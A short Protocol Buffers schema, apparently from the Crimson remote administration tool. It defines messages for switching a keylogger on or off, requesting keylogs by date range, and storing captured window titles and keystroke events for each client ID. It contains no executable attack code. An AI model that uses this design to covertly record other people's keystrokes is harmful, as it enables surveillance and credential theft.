package com.subterranean_security.crimson.core.proto;

enum State {
	UNINSTALLED = 0;
	OFFLINE = 1;
	ONLINE = 2;
}

message KeyloggerState_RQ {
	required State newState = 1;
}

message KeyloggerState_RS {
	required bool result = 1;
}

message Keylog_RQ {
	optional int64 start_date = 1;
	optional int64 end_date = 2;
}

message Keylog_RS {
}

message KLog {
	required int32 clientID = 1;
	required int32 pagemap_address = 2;
}

message KPage {
	required int64 date = 1;
	repeated string title = 2;
	repeated KEvent event = 3;
}

message KEvent {
	optional int64 date_offset = 1;
	required string event = 2;
	required int32 title = 3;
}